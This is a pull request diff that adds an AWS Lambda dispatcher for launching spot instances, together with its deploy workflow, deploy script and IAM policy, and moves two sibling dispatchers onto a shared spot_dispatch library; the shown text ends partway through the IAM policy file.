### PR TITLE
feat(sf-watch): SF-watch spot dispatcher + spot_dispatch consolidation (config#2001/#2106)

### DIFF
--- a/.github/workflows/deploy-sf-watch-spot-dispatcher.yml
+++ b/.github/workflows/deploy-sf-watch-spot-dispatcher.yml
@@ -1,0 +1,87 @@
+name: Deploy sf-watch-spot-dispatcher
+
+# Auto-deploy the alpha-engine-sf-watch-spot-dispatcher Lambda CODE on merge
+# to main. Mirrors deploy-ci-watch-dispatcher.yml — same gap, same fix: a
+# merged code fix must not sit inert until someone remembers to run deploy.sh
+# by hand. This closes that gap for the CODE path only.
+#
+# Separation of concerns: this deploys CODE only (deploy.sh with NO flag —
+# this script's default/flagless run IS already code-only; --bootstrap is
+# what ADDS the IAM-role-creation + Lambda-function-creation on top, not the
+# reverse). Same shape as ci-watch-dispatcher's: no Step Function and no
+# EventBridge Scheduler rules to keep operator-only — it's invoked
+# synchronously by a GHA job in alpha-engine-config's sf-watch.yml, so there
+# is no schedule/cadence surface for this workflow to ever need to touch. The
+# github-actions-lambda-deploy OIDC role deliberately has no iam:CreateRole /
+# iam:PutRolePolicy (fleet-wide policy after 4 IAM-clobber incidents in 2
+# months; see infrastructure/iam/README.md) — an IAM/profile change still
+# requires an operator to run `deploy.sh --bootstrap` by hand.
+#
+# IAM: no new grant needed — LambdaUpdate already covers
+# arn:...:function:alpha-engine-* (infrastructure/iam/github-actions-lambda-
+# deploy.json), which already includes this function.
+
+on:
+  push:
+    branches: [main]
+    paths:
+      - 'infrastructure/lambdas/sf-watch-spot-dispatcher/**'
+      - '.github/workflows/deploy-sf-watch-spot-dispatcher.yml'
+  workflow_dispatch:
+
+concurrency:
+  group: deploy-sf-watch-spot-dispatcher-main
+  cancel-in-progress: false
+
+permissions:
+  id-token: write
+  contents: read
+
+jobs:
+  deploy:
+    name: Deploy sf-watch-spot-dispatcher Lambda (code-only)
+    runs-on: ubuntu-latest
+    timeout-minutes: 15
+
+    steps:
+      - name: Checkout data repo
+        uses: actions/checkout@v4
+        with:
+          path: alpha-engine-data
+
+      - name: Configure AWS credentials via OIDC
+        uses: aws-actions/configure-aws-credentials@v4
+        with:
+          role-to-assume: arn:aws:iam::711398986525:role/github-actions-lambda-deploy
+          aws-region: us-east-1
+
+      - name: Set up Python 3.12 (match Lambda runtime)
+        uses: actions/setup-python@v5
+        with:
+          python-version: '3.12'
+
+      - name: Deploy sf-watch-spot-dispatcher (code-only — no --bootstrap)
+        working-directory: alpha-engine-data
+        run: bash infrastructure/lambdas/sf-watch-spot-dispatcher/deploy.sh
+
+      - name: Report deployed version
+        working-directory: alpha-engine-data
+        run: |
+          echo "Deployed commit: ${{ github.sha }}"
+          aws lambda get-function \
+            --function-name alpha-engine-sf-watch-spot-dispatcher \
+            --query "Configuration.[LastModified,CodeSha256]" \
+            --output text
+
+      - name: Append to system-wide deploy changelog
+        if: always()
+        uses: nousergon/nousergon-docs/.github/actions/append-changelog@main
+        with:
+          deploy_status: ${{ job.status == 'success' && 'success' || 'failure' }}
+          deploy_workflow: deploy-sf-watch-spot-dispatcher.yml
+
+  notify-main-failure:
+    needs: [deploy]
+    if: ${{ failure() && github.ref == 'refs/heads/main' }}
+    uses: nousergon/nousergon-lib/.github/workflows/notify-ci-failure.yml@main
+    secrets: inherit

--- a/infrastructure/lambdas/ci-watch-dispatcher/index.py
+++ b/infrastructure/lambdas/ci-watch-dispatcher/index.py
@@ -11,9 +11,11 @@ dispatcher pattern, but SIMPLER: CI-watch fires once per real CI failure event
 via a SYNCHRONOUS `lambda invoke` from a GHA job (not a schedule), so none of
 groom's tier/model/demand-gate/pace-gate complexity applies here.
 
-Mechanism (mirrors `scheduled-groom-dispatcher/index.py`, reusing the same
-fleet chokepoint — no lib change):
-  1. `nousergon_lib.ec2_spot.launch()` rotates instance_type x subnet on
+Mechanism (mirrors `scheduled-groom-dispatcher/index.py` via the shared
+`nousergon_lib.spot_dispatch` primitives, config#2106 — concurrency lock,
+launch-with-fallback, and terminate-on-failure are no longer duplicated
+per-dispatcher):
+  1. `spot_dispatch.launch_with_fallback()` rotates instance_type x subnet on
      capacity error; on SpotCapacityExhausted across all pools we relaunch
      ON-DEMAND (spot=False) so a capacity dip never silently drops a CI fix.
   2. Wait for the instance to run + its SSM agent to come Online.
@@ -60,12 +62,11 @@ from __future__ import annotations
 import logging
 import os
 import re
-import time
 import uuid
 
 import boto3
-from nousergon_lib import ec2_spot
-from nousergon_lib.ec2_spot import SpotCapacityExhausted, SpotLaunchError
+from nousergon_lib import spot_dispatch
+from nousergon_lib.spot_dispatch import SpotCapacityExhausted, SpotLaunchError
 
 logger = logging.getLogger()
 logger.setLevel(os.environ.get("LOG_LEVEL", "INFO"))
@@ -208,65 +209,36 @@ def _launch_instance() -> tuple[str, str]:
     exhaustion. Raises SpotLaunchError (or the SpotCapacityExhausted subclass)
     if BOTH the spot attempt and the on-demand fallback are exhausted/fail —
     caught once by the caller and converted to a clean launched:false."""
-    common = dict(
+    return spot_dispatch.launch_with_fallback(
+        INSTANCE_TYPES, SUBNETS,
         image_id=AMI_ID,
         key_name=KEY_NAME,
         security_group_ids=[SECURITY_GROUP],
         iam_instance_profile=IAM_PROFILE,
         volume_size_gb=VOLUME_SIZE_GB,
-        shutdown_behavior="terminate",
         tag_name=CI_WATCH_TAG_NAME,
         region=REGION,
     )
-    try:
-        iid = ec2_spot.launch(INSTANCE_TYPES, SUBNETS, spot=True, **common)
-        return iid, "spot"
-    except SpotCapacityExhausted:
-        logger.warning(
-            "spot capacity exhausted across all type x subnet pools — relaunching ON-DEMAND"
-        )
-        iid = ec2_spot.launch(INSTANCE_TYPES, SUBNETS, spot=False, **common)
-        return iid, "on-demand"
 
 
 def _wait_ssm_online(instance_id: str) -> None:
     """Block until the instance is running AND its SSM agent registers Online."""
-    ec2 = boto3.client("ec2", region_name=REGION)
-    ssm = boto3.client("ssm", region_name=REGION)
-    ec2.get_waiter("instance_running").wait(
-        InstanceIds=[instance_id], WaiterConfig={"Delay": 5, "MaxAttempts": 40}
+    spot_dispatch.wait_ssm_online(
+        instance_id, region=REGION, ssm_online_budget_sec=SSM_ONLINE_BUDGET_SEC
     )
-    deadline = time.time() + SSM_ONLINE_BUDGET_SEC
-    while time.time() < deadline:
-        info = ssm.describe_instance_information(
-            Filters=[{"Key": "InstanceIds", "Values": [instance_id]}]
-        ).get("InstanceInformationList", [])
-        if info and info[0].get("PingStatus") == "Online":
-            logger.info("SSM agent Online for %s", instance_id)
-            return
-        time.sleep(5)
-    raise RuntimeError(f"SSM agent not Online after {SSM_ONLINE_BUDGET_SEC}s for {instance_id}")
 
 
 def _send_bootstrap(instance_id: str, repo: str, sha: str, run_id: str, run_url: str,
                     workflow: str, branch: str, run_token: str) -> str:
     """Fire the async, detached SSM command that runs CI-watch + self-terminates."""
-    ssm = boto3.client("ssm", region_name=REGION)
-    resp = ssm.send_command(
-        InstanceIds=[instance_id],
-        DocumentName="AWS-RunShellScript",
-        Comment=f"ci-watch ({repo}@{sha[:12]}, run {run_id}, token {run_token[:12]})",
-        Parameters={
-            "commands": [_bootstrap_command(repo, sha, run_id, run_url, workflow, branch, run_token)],
-            "executionTimeout": [str(MAX_RUNTIME_SECONDS)],
-        },
-        TimeoutSeconds=600,  # time to START delivering before giving up
-        CloudWatchOutputConfig={
-            "CloudWatchLogGroupName": CW_LOG_GROUP,
-            "CloudWatchOutputEnabled": True,
-        },
+    return spot_dispatch.send_async_command(
+        instance_id,
+        _bootstrap_command(repo, sha, run_id, run_url, workflow, branch, run_token),
+        comment=f"ci-watch ({repo}@{sha[:12]}, run {run_id}, token {run_token[:12]})",
+        region=REGION,
+        cw_log_group=CW_LOG_GROUP,
+        execution_timeout_seconds=MAX_RUNTIME_SECONDS,
     )
-    return resp["Command"]["CommandId"]
 
 
 def _running_ci_watch_instance_ids(repo: str, sha: str) -> list[str]:
@@ -277,19 +249,11 @@ def _running_ci_watch_instance_ids(repo: str, sha: str) -> list[str]:
     returns [] (never blocks a launch on a broken check — an optimization,
     not a correctness gate, mirroring every other pre-launch guard in the
     fleet)."""
-    try:
-        ec2 = boto3.client("ec2", region_name=REGION)
-        resp = ec2.describe_instances(Filters=[
-            {"Name": "tag:Name", "Values": [CI_WATCH_TAG_NAME]},
-            {"Name": f"tag:{CI_WATCH_REPO_TAG_KEY}", "Values": [repo]},
-            {"Name": f"tag:{CI_WATCH_SHA_TAG_KEY}", "Values": [sha]},
-            {"Name": "instance-state-name", "Values": ["pending", "running"]},
-        ])
-        return [i["InstanceId"] for r in resp.get("Reservations", []) for i in r.get("Instances", [])]
-    except Exception as exc:  # noqa: BLE001 — fail-safe: never block a launch
-        logger.warning("concurrency check failed (non-fatal, launching anyway): %s: %s",
-                       type(exc).__name__, exc)
-        return []
+    return spot_dispatch.running_instance_ids(
+        CI_WATCH_TAG_NAME,
+        {CI_WATCH_REPO_TAG_KEY: repo, CI_WATCH_SHA_TAG_KEY: sha},
+        region=REGION,
+    )
 
 
 def _terminate_instance(instance_id: str) -> None:
@@ -298,14 +262,7 @@ def _terminate_instance(instance_id: str) -> None:
     neither the on-box watchdog nor the EXIT trap (both armed BY the
     bootstrap) is running to tear it down. Never masks the original error
     (logged, not raised) — mirrors groom's `_terminate_instance` exactly."""
-    try:
-        boto3.client("ec2", region_name=REGION).terminate_instances(InstanceIds=[instance_id])
-        logger.warning("terminated ci-watch box %s after post-launch failure (no orphan)", instance_id)
-    except Exception as exc:  # noqa: BLE001 — cleanup; caller still returns a clean result
-        logger.error(
-            "FAILED to terminate %s after a post-launch error (%s) — MANUAL cleanup needed",
-            instance_id, exc,
-        )
+    spot_dispatch.terminate_on_failure(instance_id, region=REGION, label="ci-watch")
 
 
 def _launch_ci_watch_spot(repo: str, sha: str, run_id: str, run_url: str,

--- a/infrastructure/lambdas/ci-watch-dispatcher/requirements.txt
+++ b/infrastructure/lambdas/ci-watch-dispatcher/requirements.txt
@@ -1,8 +1,11 @@
 # boto3 is provided by the Lambda python3.12 runtime; pinned for reproducible builds.
 boto3>=1.34.0
-# nousergon_lib.ec2_spot re-exports krepis.ec2_spot (the spot-launch capacity-
-# resilience chokepoint) — SAME pin as scheduled-groom-dispatcher/data-spot-dispatcher.
-# No [flow-doctor] extra needed — this Lambda sends no Telegram of its own (the
-# synchronous GHA caller reads the return value directly; see index.py docstring).
-nousergon-lib @ git+https://github.com/nousergon/nousergon-lib@v0.97.0
+# nousergon_lib.spot_dispatch (config#2106) wraps krepis.ec2_spot (the
+# spot-launch capacity-resilience chokepoint) — SAME pin as
+# scheduled-groom-dispatcher/data-spot-dispatcher. v0.100.0 is the first
+# version carrying spot_dispatch (bumped from v0.97.0 alongside the
+# groom/ci-watch dispatcher refactor onto it). No [flow-doctor] extra needed
+# — this Lambda sends no Telegram of its own (the synchronous GHA caller
+# reads the return value directly; see index.py docstring).
+nousergon-lib @ git+https://github.com/nousergon/nousergon-lib@v0.100.0
 krepis>=0.10.2

--- a/infrastructure/lambdas/scheduled-groom-dispatcher/index.py
+++ b/infrastructure/lambdas/scheduled-groom-dispatcher/index.py
@@ -65,7 +65,6 @@ import json
 import logging
 import os
 import re
-import time
 import uuid
 from datetime import datetime, timedelta
 from zoneinfo import ZoneInfo
@@ -76,9 +75,8 @@ from krepis.usage_pacing import pace_check, reset_window
 import urllib.error
 import urllib.request
 
-from nousergon_lib import ec2_spot
 from nousergon_lib import groom_eligibility as ge
-from nousergon_lib.ec2_spot import SpotCapacityExhausted
+from nousergon_lib import spot_dispatch
 from nousergon_lib.flow_doctor_fleet import FleetTelegramTopic
 
 logger = logging.getLogger()
@@ -389,49 +387,23 @@ def _launch_instance(force_on_demand: bool = False) -> tuple[str, str]:
     OR when force_on_demand (config#1645: the dispatch SF's last bounded relaunch
     attempt after repeated mid-run spot interruption — skip straight to on-demand
     rather than trying the same flaky spot market a third time)."""
-    common = dict(
+    return spot_dispatch.launch_with_fallback(
+        INSTANCE_TYPES, SUBNETS,
         image_id=AMI_ID,
         key_name=KEY_NAME,
         security_group_ids=[SECURITY_GROUP],
         iam_instance_profile=IAM_PROFILE,
         volume_size_gb=VOLUME_SIZE_GB,
-        shutdown_behavior="terminate",
         tag_name="alpha-engine-groom-spot",
         region=REGION,
+        force_on_demand=force_on_demand,
     )
-    if force_on_demand:
-        logger.warning("force_on_demand set (config#1645 relaunch escalation) — launching ON-DEMAND")
-        iid = ec2_spot.launch(INSTANCE_TYPES, SUBNETS, spot=False, **common)
-        return iid, "on-demand"
-    try:
-        iid = ec2_spot.launch(INSTANCE_TYPES, SUBNETS, spot=True, **common)
-        return iid, "spot"
-    except SpotCapacityExhausted:
-        logger.warning(
-            "spot capacity exhausted across all type×subnet pools — relaunching ON-DEMAND"
-        )
-        iid = ec2_spot.launch(INSTANCE_TYPES, SUBNETS, spot=False, **common)
-        return iid, "on-demand"
 
 
 def _wait_ssm_online(instance_id: str) -> None:
     """Block until the instance is running AND its SSM agent registers Online."""
-    ec2 = boto3.client("ec2", region_name=REGION)
-    ssm = boto3.client("ssm", region_name=REGION)
-    ec2.get_waiter("instance_running").wait(
-        InstanceIds=[instance_id], WaiterConfig={"Delay": 5, "MaxAttempts": 40}
-    )
-    deadline = time.time() + SSM_ONLINE_BUDGET_SEC
-    while time.time() < deadline:
-        info = ssm.describe_instance_information(
-            Filters=[{"Key": "InstanceIds", "Values": [instance_id]}]
-        ).get("InstanceInformationList", [])
-        if info and info[0].get("PingStatus") == "Online":
-            logger.info("SSM agent Online for %s", instance_id)
-            return
-        time.sleep(5)
-    raise RuntimeError(
-        f"SSM agent not Online after {SSM_ONLINE_BUDGET_SEC}s for {instance_id}"
+    spot_dispatch.wait_ssm_online(
+        instance_id, region=REGION, ssm_online_budget_sec=SSM_ONLINE_BUDGET_SEC
     )
 
 
@@ -439,26 +411,18 @@ def _send_bootstrap(instance_id: str, run_mode: str, run_url: str, model: str, i
                     run_token: str, soft_limit_min: int | None = None,
                     pr_budget: int | None = None, no_sweep: bool = False) -> str:
     """Fire the async, detached SSM command that runs the groom + self-terminates."""
-    ssm = boto3.client("ssm", region_name=REGION)
-    resp = ssm.send_command(
-        InstanceIds=[instance_id],
-        DocumentName="AWS-RunShellScript",
-        Comment=f"backlog groom ({run_mode}, {model}, {issue_filter}) — config#1432/#1495/#1645",
-        Parameters={
-            "commands": [_bootstrap_command(
-                run_mode, run_url, model, issue_filter, run_token, soft_limit_min, pr_budget, no_sweep,
-            )],
-            # Execution timeout (NOT the start timeout) — without this SSM kills the
-            # command at the 3600s default, guillotining a multi-hour groom.
-            "executionTimeout": [str(MAX_RUNTIME_SECONDS)],
-        },
-        TimeoutSeconds=600,  # time to START delivering before giving up
-        CloudWatchOutputConfig={
-            "CloudWatchLogGroupName": CW_LOG_GROUP,
-            "CloudWatchOutputEnabled": True,
-        },
+    return spot_dispatch.send_async_command(
+        instance_id,
+        _bootstrap_command(
+            run_mode, run_url, model, issue_filter, run_token, soft_limit_min, pr_budget, no_sweep,
+        ),
+        comment=f"backlog groom ({run_mode}, {model}, {issue_filter}) — config#1432/#1495/#1645",
+        region=REGION,
+        cw_log_group=CW_LOG_GROUP,
+        # Execution timeout (NOT the start timeout) — without this SSM kills the
+        # command at the 3600s default, guillotining a multi-hour groom.
+        execution_timeout_seconds=MAX_RUNTIME_SECONDS,
     )
-    return resp["Command"]["CommandId"]
 
 
 GROOM_TIER_TAG_KEY = "groom-issue-filter"
@@ -475,18 +439,11 @@ def _running_tier_instance_ids(issue_filter: str) -> list[str]:
     tier. Fail-safe: any API error returns ``[]`` (never blocks a launch on a
     broken check — this guard is an optimization, not a correctness gate,
     mirroring every other pre-launch gate in this file)."""
-    try:
-        ec2 = boto3.client("ec2", region_name=REGION)
-        resp = ec2.describe_instances(Filters=[
-            {"Name": "tag:Name", "Values": ["alpha-engine-groom-spot"]},
-            {"Name": f"tag:{GROOM_TIER_TAG_KEY}", "Values": [issue_filter]},
-            {"Name": "instance-state-name", "Values": ["pending", "running"]},
-        ])
-        return [i["InstanceId"] for r in resp.get("Reservations", []) for i in r.get("Instances", [])]
-    except Exception as exc:  # noqa: BLE001 — fail-safe: never block a launch
-        logger.warning("concurrent-tier check failed (non-fatal, launching anyway): %s: %s",
-                       type(exc).__name__, exc)
-        return []
+    return spot_dispatch.running_instance_ids(
+        "alpha-engine-groom-spot",
+        {GROOM_TIER_TAG_KEY: issue_filter},
+        region=REGION,
+    )
 
 
 def _notify_concurrent_skip(issue_filter: str, existing_ids: list[str], schedule_label: str) -> None:
@@ -518,14 +475,7 @@ def _terminate_instance(instance_id: str) -> None:
     the in-script watchdog nor the EXIT trap (both armed BY the bootstrap) is
     running to tear it down — it idles until manually killed. Never masks the
     original error (logged, not raised)."""
-    try:
-        boto3.client("ec2", region_name=REGION).terminate_instances(InstanceIds=[instance_id])
-        logger.warning("terminated groom box %s after post-launch failure (no orphan)", instance_id)
-    except Exception as exc:  # noqa: BLE001 — cleanup; the original error re-raises below
-        logger.error(
-            "FAILED to terminate %s after a post-launch error (%s) — MANUAL cleanup needed",
-            instance_id, exc,
-        )
+    spot_dispatch.terminate_on_failure(instance_id, region=REGION, label="groom")
 
 
 def _launch_groom_spot(run_mode: str, schedule_label: str, model: str, issue_filter: str,

--- a/infrastructure/lambdas/scheduled-groom-dispatcher/requirements.txt
+++ b/infrastructure/lambdas/scheduled-groom-dispatcher/requirements.txt
@@ -1,5 +1,8 @@
 # boto3 is provided by the Lambda python3.12 runtime; pinned for reproducible builds.
 boto3>=1.34.0
-# config#1742 T2 — flow-doctor forum routing + ec2_spot launch chokepoint.
-nousergon-lib[flow-doctor] @ git+https://github.com/nousergon/nousergon-lib@v0.97.0
+# config#1742 T2 — flow-doctor forum routing; config#2106 — spot_dispatch
+# launch chokepoint (replaces the bare ec2_spot chokepoint this Lambda used
+# directly through v0.97.0). v0.100.0 is the first version carrying
+# spot_dispatch.
+nousergon-lib[flow-doctor] @ git+https://github.com/nousergon/nousergon-lib@v0.100.0
 krepis>=0.10.2

--- a/infrastructure/lambdas/scheduled-groom-dispatcher/test_handler.py
+++ b/infrastructure/lambdas/scheduled-groom-dispatcher/test_handler.py
@@ -159,6 +159,20 @@ def _load(monkeypatch, *, launch_impl=None, env=None, s3_objects=None, ssm_param
     from _shared.hermetic_import_guard import assert_hermetic_imports_satisfied
 
     assert_hermetic_imports_satisfied(__file__)
+    # nousergon_lib.spot_dispatch (config#2106) sits between index.py and the
+    # stubbed nousergon_lib.ec2_spot/boto3 above. Its own `from nousergon_lib
+    # import ec2_spot` / `import boto3` bindings are resolved once at ITS
+    # import time — if it's already cached in sys.modules from a prior test's
+    # stub, `import index` + reload(index) alone would NOT re-resolve those
+    # bindings (index just re-fetches the same, stale spot_dispatch module
+    # object). Reload spot_dispatch in place first (never a bare del+reimport
+    # — see reference_pytest_del_reimport_vs_reload_fixture_corruption_260709)
+    # so every test sees the CURRENT stub.
+    if "nousergon_lib.spot_dispatch" in sys.modules:
+        importlib.reload(sys.modules["nousergon_lib.spot_dispatch"])
+    else:
+        import nousergon_lib.spot_dispatch  # noqa: F401 — first import picks up the current stub
+
     import index
 
     importlib.reload(index)
@@ -310,7 +324,10 @@ def test_pace_gate_skips_launch_when_usage_ahead_of_pace(monkeypatch):
     def _launch(types_, subnets, **kw):
         raise AssertionError("spot launch must NOT be attempted when the pace gate skips")
 
-    monkeypatch.setattr(idx.ec2_spot, "launch", _launch)
+    # index.py now delegates through nousergon_lib.spot_dispatch (config#2106)
+    # rather than calling nousergon_lib.ec2_spot directly — patch the entry
+    # point it actually calls.
+    monkeypatch.setattr(idx.spot_dispatch, "launch_with_fallback", _launch)
     out = idx.handler({"run_mode": "full", "schedule": "0 23 * * *"}, None)
     g = out["groom"]
     assert g["launched"] is False

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/deploy.sh
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/deploy.sh
@@ -1,0 +1,200 @@
+#!/usr/bin/env bash
+# deploy.sh — Create or update the alpha-engine-sf-watch-spot-dispatcher Lambda.
+#
+# WHY: finishes config#2001 (the saturday-sf-failure half; the ci-main-failure
+# half shipped as ci-watch-dispatcher/deploy.sh under the same issue). Fleet-SF
+# Watch's diagnose-fix-rerun agent still ran on a GHA-hosted `ubuntu-latest`
+# runner for saturday-sf-failure, burning the org's metered Actions-minutes
+# budget — exactly the exposure config#2001 was filed to eliminate. This
+# Lambda moves it to EC2 spot, mirroring ci-watch-dispatcher's PROVEN pattern
+# byte-for-byte in shape: no Step Function, no EventBridge Scheduler rules —
+# invoked directly via a SYNCHRONOUS `lambda invoke` from a GHA job (built in
+# alpha-engine-config's sf-watch.yml, `sf-watch-dispatch` job) once per real
+# saturday-sf-failure event, not on a cron cadence.
+#
+# IAM (iam-policy.json): the Lambda needs ec2:RunInstances + iam:PassRole
+# (scoped to alpha-engine-sf-watch-executor-role — a NEW, dedicated role
+# created in alpha-engine-config, deliberately NOT the shared trading
+# alpha-engine-executor-role NOR the OIDC-only saturday-sf-watch-role) +
+# ssm:SendCommand. The BOX reads its own run secrets (PAT) via ITS instance
+# profile, so this Lambda needs no secret access of its own.
+#
+# Managed OUTSIDE CloudFormation (same rationale as the sibling dispatchers):
+# keeps the github-actions-lambda-deploy OIDC role's blast radius narrow — it
+# deliberately lacks iam:CreateRole/iam:PutRolePolicy (fleet-wide policy after
+# 4 IAM-clobber incidents). This script's FLAGLESS run is already code-only
+# (this is what the GHA auto-deploy workflow calls); --bootstrap is what ADDS
+# IAM-role-creation + Lambda-function-creation on top, operator-run only,
+# never in CI.
+#
+# Usage:
+#   bash .../sf-watch-spot-dispatcher/deploy.sh             # update code only (also the CI auto-deploy path)
+#   bash .../sf-watch-spot-dispatcher/deploy.sh --bootstrap # operator-only: create/update the IAM role + Lambda function
+#   bash .../sf-watch-spot-dispatcher/deploy.sh --dry-run   # show actions, do not apply
+#   bash .../sf-watch-spot-dispatcher/deploy.sh --smoke     # invoke once with a synthetic event (fires a REAL spot box)
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+FUNCTION_NAME="alpha-engine-sf-watch-spot-dispatcher"
+ROLE_NAME="alpha-engine-sf-watch-spot-dispatcher-role"
+POLICY_NAME="alpha-engine-sf-watch-spot-dispatcher-policy"
+REGION="${AWS_REGION:-us-east-1}"
+ACCOUNT_ID="${ACCOUNT_ID:-711398986525}"
+
+DRY_RUN=false
+BOOTSTRAP=false
+SMOKE=false
+for arg in "$@"; do
+  case "$arg" in
+    --dry-run) DRY_RUN=true ;;
+    --bootstrap) BOOTSTRAP=true ;;
+    --smoke) SMOKE=true ;;
+    -h|--help) sed -n '2,/^$/p' "$0"; exit 0 ;;
+  esac
+done
+
+run() {
+  if $DRY_RUN; then
+    echo "DRY: $*"
+  else
+    "$@"
+  fi
+}
+
+# ----- 0. Scratch dirs + validate handler syntax -----------------------------
+# PKG and TEST_DEPS are both created up front (mirrors ci-watch-dispatcher/
+# scheduled-groom-dispatcher/deploy.sh) so ONE trap covers both — a
+# pytest-install failure below still cleans up.
+
+PKG=$(mktemp -d)
+TEST_DEPS=$(mktemp -d)
+trap "rm -rf '$PKG' '$TEST_DEPS'" EXIT
+
+python3 -c "
+import ast
+src = open('${SCRIPT_DIR}/index.py').read()
+ast.parse(src)
+print('index.py syntax OK')
+"
+
+# ----- 0b. Preflight handler unit tests --------------------------------------
+# Hermetic for AWS: boto3 + nousergon_lib.ec2_spot are stubbed in sys.modules
+# before `import index` (see test_handler.py). The pinned nousergon-lib +
+# krepis are installed for real into a scratch TEST_DEPS dir — NOT the
+# caller's global site-packages, not bundled into the Lambda zip.
+if [[ -f "${SCRIPT_DIR}/test_handler.py" ]]; then
+  NOUSERGON_LIB_REQ=$(grep -E '^nousergon-lib' "${SCRIPT_DIR}/requirements.txt" | head -1)
+  KREPIS_REQ=$(grep -E '^krepis' "${SCRIPT_DIR}/requirements.txt" | head -1)
+  echo "Installing pytest + krepis + pinned nousergon-lib into ${TEST_DEPS}..."
+  python3 -m pip install --quiet --target "${TEST_DEPS}" pytest "${KREPIS_REQ}" "${NOUSERGON_LIB_REQ}"
+  echo "Running handler unit tests..."
+  PYTHONPATH="${TEST_DEPS}" python3 -m pytest "${SCRIPT_DIR}/test_handler.py" -q
+fi
+
+# ----- 1. Package: pip install deps + zip handler ---------------------------
+
+LAMBDAS_DIR="$(cd "${SCRIPT_DIR}/.." && pwd)"
+
+echo "Installing deps into ${PKG} (Lambda-safe Docker pip)..."
+bash "${LAMBDAS_DIR}/lambda_pip_install.sh" "${PKG}" "${SCRIPT_DIR}/requirements.txt"
+
+cp "${SCRIPT_DIR}/index.py" "${PKG}/index.py"
+ZIP="${PKG}/function.zip"
+(cd "${PKG}" && zip -qr "function.zip" . -x "function.zip")
+echo "Packaged ${ZIP} ($(wc -c < "${ZIP}") bytes)"
+
+# ----- 2. Bootstrap (first-time only) ---------------------------------------
+
+if $BOOTSTRAP; then
+  echo "Bootstrapping ${FUNCTION_NAME}..."
+
+  # --- 2a. Lambda execution role + inline policy ---
+  TRUST_POLICY='{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"lambda.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
+  if ! aws iam get-role --role-name "${ROLE_NAME}" --query 'Role.RoleName' --output text >/dev/null 2>&1; then
+    echo "  Creating IAM role: ${ROLE_NAME}"
+    run aws iam create-role \
+      --role-name "${ROLE_NAME}" \
+      --assume-role-policy-document "${TRUST_POLICY}" \
+      --query 'Role.RoleName' --output text
+  else
+    echo "  IAM role exists: ${ROLE_NAME}"
+  fi
+
+  echo "  Applying inline policy: ${POLICY_NAME}"
+  run aws iam put-role-policy \
+    --role-name "${ROLE_NAME}" \
+    --policy-name "${POLICY_NAME}" \
+    --policy-document "file://${SCRIPT_DIR}/iam-policy.json"
+
+  if ! $DRY_RUN; then
+    echo "  Waiting 10s for IAM role propagation..."
+    sleep 10
+  fi
+
+  # --- 2b. Lambda function ---
+  ROLE_ARN="arn:aws:iam::${ACCOUNT_ID}:role/${ROLE_NAME}"
+  if ! aws lambda get-function --function-name "${FUNCTION_NAME}" --query 'Configuration.FunctionName' --output text >/dev/null 2>&1; then
+    echo "  Creating Lambda: ${FUNCTION_NAME}"
+    run aws lambda create-function \
+      --function-name "${FUNCTION_NAME}" \
+      --runtime python3.12 \
+      --role "${ROLE_ARN}" \
+      --handler index.handler \
+      --zip-file "fileb://${ZIP}" \
+      --timeout 300 \
+      --memory-size 256 \
+      --environment 'Variables={LOG_LEVEL=INFO,SF_WATCH_DISPATCH_ENABLED=true}' \
+      --region "${REGION}" \
+      --query 'FunctionArn' --output text
+  else
+    echo "  Lambda exists, code will be updated in step 3"
+  fi
+fi
+
+# ----- 3. Update function code (always after bootstrap, idempotent) ---------
+
+echo "Updating Lambda function code: ${FUNCTION_NAME}"
+run aws lambda update-function-code \
+  --function-name "${FUNCTION_NAME}" \
+  --zip-file "fileb://${ZIP}" \
+  --region "${REGION}" \
+  --query 'LastUpdateStatus' --output text
+
+if ! $DRY_RUN; then
+  aws lambda wait function-updated \
+    --function-name "${FUNCTION_NAME}" \
+    --region "${REGION}"
+fi
+
+echo "✓ Code deployed."
+
+echo "Updating Lambda environment..."
+run aws lambda update-function-configuration \
+  --function-name "${FUNCTION_NAME}" \
+  --environment 'Variables={LOG_LEVEL=INFO,SF_WATCH_DISPATCH_ENABLED=true}' \
+  --region "${REGION}" \
+  --query 'LastUpdateStatus' --output text
+if ! $DRY_RUN; then
+  aws lambda wait function-updated \
+    --function-name "${FUNCTION_NAME}" \
+    --region "${REGION}"
+fi
+
+# ----- 4. Smoke (synthetic event, direct invoke) -----------------------------
+
+if $SMOKE; then
+  echo ""
+  echo "Smoke-testing via direct invoke (synthetic saturday-sf-failure event)..."
+  echo "⚠ this fires a REAL spot box + REAL sf_watch_spot_bootstrap.sh run."
+  RESP=$(mktemp)
+  trap "rm -f '${RESP}'" EXIT
+  aws lambda invoke \
+    --function-name "${FUNCTION_NAME}" \
+    --payload '{"pipeline_name":"ne-weekly-freshness-pipeline","cadence_slug":"saturday","state_machine_arn":"arn:aws:states:us-east-1:711398986525:stateMachine:ne-weekly-freshness-pipeline","execution_arn":"arn:aws:states:us-east-1:711398986525:execution:ne-weekly-freshness-pipeline:smoke-test-0000000000000000","run_date":"1970-01-01","failed_state":"SmokeTest","cause":"synthetic smoke-test invocation, not a real failure","watch_log_key":"consolidated/saturday_sf_watch/1970-01-01.json","is_preflight":"false"}' \
+    --cli-binary-format raw-in-base64-out \
+    --region "${REGION}" \
+    "${RESP}" >/dev/null
+  cat "${RESP}"
+  echo ""
+fi

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/iam-policy.json
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/iam-policy.json
@@ -1,0 +1,59 @@
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "Logs",
+      "Effect": "Allow",
+      "Action": [
+        "logs:CreateLogGroup",
+        "logs:CreateLogStream",
+        "logs:PutLogEvents"
+      ],
+      "Resource": "arn:aws:logs:us-east-1:711398986525:log-group:/aws/lambda/alpha-engine-sf-watch-spot-dispatcher:*"
+    },
+    {
+      "Sid": "LaunchSfWatchSpot",
+      "Effect": "Allow",
+      "Action": [
+        "ec2:RunInstances",
+        "ec2:CreateTags",
+        "ec2:DescribeInstances",
+        "ec2:DescribeInstanceStatus"
+      ],
+      "Resource": "*"
+    },
+    {
+      "Sid": "PassSfWatchExecutorRoleToEc2",
+      "Effect": "Allow",
+      "Action": "iam:PassRole",
+      "Resource": "arn:aws:iam::711398986525:role/alpha-engine-sf-watch-executor-role",
